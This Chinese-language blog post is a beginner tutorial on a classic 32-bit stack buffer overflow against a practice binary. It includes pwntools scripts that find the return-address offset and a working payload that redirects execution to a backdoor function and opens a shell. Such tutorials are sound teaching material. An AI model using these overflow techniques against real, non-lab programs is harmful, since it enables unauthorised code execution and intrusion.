<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.4.1" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.4.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.4.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.4.1">


  <link rel="mask-icon" href="/images/logo.svg?v=6.4.1" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '6.4.1',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="现在我们来介绍一下最简单的栈溢出吧 首先先来下载一个程序 pwn_level1 下载完之后，我们用32位的ida打开 反编译看到main函数  这里很明显就有一个栈溢出 我们把程序复制进虚拟机中  然后会显示./pwn_level1: No such file or directory 这是因为我们装的是64位系统，而这个程序是32位的 我们可以执行下面的命令，安装一些东西来运行32位程序 1ap">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn从入门到放弃第五章——最简简简简简简单的栈溢出">
<meta property="og:url" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/index.html">
<meta property="og:site_name" content="PWN? PWN!">
<meta property="og:description" content="现在我们来介绍一下最简单的栈溢出吧 首先先来下载一个程序 pwn_level1 下载完之后，我们用32位的ida打开 反编译看到main函数  这里很明显就有一个栈溢出 我们把程序复制进虚拟机中  然后会显示./pwn_level1: No such file or directory 这是因为我们装的是64位系统，而这个程序是32位的 我们可以执行下面的命令，安装一些东西来运行32位程序 1ap">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t1.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t2.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t3.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t4.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t5.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t6.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t7.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t8.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t9.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t10.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t11.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t12.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t13.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t14.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t15.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t16.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t17.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t18.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t19.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t19.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t16.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t15.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t20.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t21.png">
<meta property="og:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t22.png">
<meta property="og:updated_time" content="2018-07-29T14:29:40.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pwn从入门到放弃第五章——最简简简简简简单的栈溢出">
<meta name="twitter:description" content="现在我们来介绍一下最简单的栈溢出吧 首先先来下载一个程序 pwn_level1 下载完之后，我们用32位的ida打开 反编译看到main函数  这里很明显就有一个栈溢出 我们把程序复制进虚拟机中  然后会显示./pwn_level1: No such file or directory 这是因为我们装的是64位系统，而这个程序是32位的 我们可以执行下面的命令，安装一些东西来运行32位程序 1ap">
<meta name="twitter:image" content="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t1.png">






  <link rel="canonical" href="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>pwn从入门到放弃第五章——最简简简简简简单的栈溢出 | PWN? PWN!</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">PWN? PWN!</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />Home</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />Archives</a>
  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://ch4r1l3.github.io/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Charlie">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="PWN? PWN!">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">pwn从入门到放弃第五章——最简简简简简简单的栈溢出
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2018-07-20 10:25:23" itemprop="dateCreated datePublished" datetime="2018-07-20T10:25:23+08:00">2018-07-20</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2018-07-29 22:29:40" itemprop="dateModified" datetime="2018-07-29T22:29:40+08:00">2018-07-29</time>
              
            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>现在我们来介绍一下最简单的栈溢出吧</p>
<p>首先先来下载一个程序</p>
<p><a href="https://github.com/charlieleex/charlieleex.github.io/tree/master/2018/07/20/pwn%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83%E7%AC%AC%E4%BA%94%E7%AB%A0%E2%80%94%E2%80%94%E6%9C%80%E7%AE%80%E7%AE%80%E7%AE%80%E7%AE%80%E7%AE%80%E7%AE%80%E5%8D%95%E7%9A%84%E6%A0%88%E6%BA%A2%E5%87%BA/pwn_level1" target="_blank" rel="noopener">pwn_level1</a></p>
<p>下载完之后，我们用32位的ida打开</p>
<p>反编译看到main函数</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t1.png" alt=""></p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t2.png" alt=""><br>这里很明显就有一个栈溢出</p>
<p>我们把程序复制进虚拟机中</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t3.png" alt=""></p>
<p>然后会显示./pwn_level1: No such file or directory</p>
<p>这是因为我们装的是64位系统，而这个程序是32位的</p>
<p>我们可以执行下面的命令，安装一些东西来运行32位程序</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install lib32z1 lib32ncurses5</span><br></pre></td></tr></table></figure>
<p>安装完之后，再运行程序</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t4.png" alt=""></p>
<p>这样就能正常的运行和调试了</p>
<h3 id="第一步，计算控制程序eip所需要的字符数量"><a href="#第一步，计算控制程序eip所需要的字符数量" class="headerlink" title="第一步，计算控制程序eip所需要的字符数量"></a>第一步，计算控制程序eip所需要的字符数量</h3><p>到了这里，需要有一些汇编的基础</p>
<p>这里给下几篇简单入门的教程，不过最好可以系统的学一下，书我推荐王爽的《汇编语言》</p>
<p><a href="https://blog.csdn.net/q_l_s/article/details/54925771" target="_blank" rel="noopener">X86汇编快速入门</a></p>
<p><a href="https://blog.csdn.net/cagent_z/article/details/57409433" target="_blank" rel="noopener">从一段x86汇编程序看计算机是如何工作</a></p>
<p>看完上面那两个教程之后，我们来计算一下控制程序eip所需要的字符数量</p>
<p>cd 到Desktop，然后输入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim level1.py</span><br></pre></td></tr></table></figure>
<p>对了，这里还需要简单学一下vim的操作</p>
<p><a href="https://www.cnblogs.com/harry335/p/5886405.html" target="_blank" rel="noopener">Vim教程</a></p>
<p>简单学一下基础就可以了，不用学得太深</p>
<p>我们在level1.py里面写入下面的代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">p=process(&apos;./pwn_level1&apos;)</span><br><span class="line">context.log_level=&apos;debug&apos;</span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.recvuntil(&apos;try to stackoverflow!!&apos;)</span><br><span class="line"></span><br><span class="line">p.send(cyclic(0x100))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>保存，然后在terminal下面运行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python level1.py</span><br></pre></td></tr></table></figure>
<p>运行之后会出现<br><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t5.png" alt=""></p>
<p>在gdb那个窗口下面输入c，然后回车</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t6.png" alt=""></p>
<p>发现程序停在了这里，这是因为我们栈溢出，控制了eip，eip变成0x65616161，但是这个地址跳转不了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">print(cyclic_find(0x65616161))</span><br></pre></td></tr></table></figure>
<p>在代码后面加上这句</p>
<p>然后再运行一次，打印出13，看来偏移是13</p>
<p>所以我们只要填充13个字符就能控制到eip了</p>
<h3 id="第二步，跳转到后门"><a href="#第二步，跳转到后门" class="headerlink" title="第二步，跳转到后门"></a>第二步，跳转到后门</h3><p>我们在ida里面看到</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t7.png" alt=""></p>
<p>有一个后门函数，地址是在804849A开始的</p>
<p>我们如果想跳转到这里，只要填充13个字符，再加上p32(0x804849A)就可以了</p>
<p>所以最终的payload是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">p=process(&apos;./pwn_level1&apos;)</span><br><span class="line">context.log_level=&apos;debug&apos;</span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.recvuntil(&apos;try to stackoverflow!!&apos;)</span><br><span class="line"></span><br><span class="line">p.send(&apos;a&apos;*13+p32(0x804849A))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>运行一下，在运行脚本那个terminal输入ls，可以看到打印了桌面的文件</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t8.png" alt=""></p>
<h3 id="简单了解一下这样做的原理"><a href="#简单了解一下这样做的原理" class="headerlink" title="简单了解一下这样做的原理"></a>简单了解一下这样做的原理</h3><p>我们用gdb调试程序，在80484C4这个地址下个断点</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t9.png" alt=""></p>
<p>这里是call vulnerable_function</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t10.png" alt=""></p>
<p>输入r运行</p>
<p>我们可以看下这个时候，ebp和esp的值</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t11.png" alt=""></p>
<p>再输入s</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t12.png" alt=""></p>
<p>可以看到esp减少了0x4</p>
<p>而且栈顶现在是0x80484c9，是call vulnerable_function下一条指令的地址</p>
<p>所以我们可以知道</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">call function</span><br></pre></td></tr></table></figure>
<p>等价于<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">push eip+x</span><br><span class="line">jmp function</span><br></pre></td></tr></table></figure></p>
<p>这样做是为了调用完函数之后，能顺利的返回</p>
<p>然后我们看下vulnerable_function函数里面的东西</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t13.png" alt=""></p>
<p>前3行是将ebp压入栈，然后将当前的esp转移到ebp，再将esp减去0x18</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t14.png" alt=""></p>
<p>最后三行是将esp加上0x10</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">leave </span><br><span class="line">=</span><br><span class="line">mov esp,ebp</span><br><span class="line">pop ebp</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">retn = pop eip</span><br></pre></td></tr></table></figure>
<p>然后我们将这个流程用图示来显示</p>
<p>这个是一开始停在call vulnerable_function那里的栈的大概示意图</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t15.png" alt=""></p>
<p>这个是刚进到函数里面时的情况</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t16.png" alt=""></p>
<p>这是执行完push ebp后的情况</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t17.png" alt=""></p>
<p>这个是执行完mov ebp,esp之后</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t18.png" alt=""></p>
<p>执行完sub esp,0x18后</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t19.png" alt=""></p>
<p>然后我们可以在gdb调试一下，然后发现执行完add esp,0x10之后，栈的状况又回到了</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t19.png" alt=""></p>
<p>执行完leave后</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t16.png" alt=""></p>
<p>执行完ret后<br><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t15.png" alt=""></p>
<p>这个是正常的流程，假如我们用cyclic(0x100)来栈溢出呢？</p>
<p>执行完read之后就变成这样了</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t20.png" alt=""></p>
<p>原本保存ebp和返回地址的地方现在被我们输入的内容给覆盖，这里可能有点画得不准确，大概明白就行</p>
<p>执行leave之后就变成</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t21.png" alt=""></p>
<p>再执行retn就变成</p>
<p><img src="/2018/07/20/pwn从入门到放弃第五章——最简简简简简简单的栈溢出/t22.png" alt=""></p>
<p>这个就是为什么我们栈溢出能控制程序eip的原因了</p>
<p>我们只需要把0x65616161替换成我们想跳转的地址，就能跳转到那个地方</p>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/07/19/pwn从入门到放弃第四章——pwntools的基本使用教程/" rel="next" title="pwn从入门到放弃第四章——pwntools的基本使用教程">
                <i class="fa fa-chevron-left"></i> pwn从入门到放弃第四章——pwntools的基本使用教程
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/07/29/pwn从入门到放弃第六章——简单ROP/" rel="prev" title="pwn从入门到放弃第六章——简单ROP">
                pwn从入门到放弃第六章——简单ROP <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Charlie</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">33</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              

              
            </nav>
          

          

          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#第一步，计算控制程序eip所需要的字符数量"><span class="nav-number">1.</span> <span class="nav-text">第一步，计算控制程序eip所需要的字符数量</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#第二步，跳转到后门"><span class="nav-number">2.</span> <span class="nav-text">第二步，跳转到后门</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#简单了解一下这样做的原理"><span class="nav-number">3.</span> <span class="nav-text">简单了解一下这样做的原理</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Charlie</span>

  

  
</div>




  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> v3.7.1</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme – <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Gemini</a> v6.4.1</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.4.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.4.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.4.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.4.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.4.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.4.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.4.1"></script>



  



  










  





  

  

  

  
  

  
  

  


  
  

  

  

  

  

  

</body>
</html>
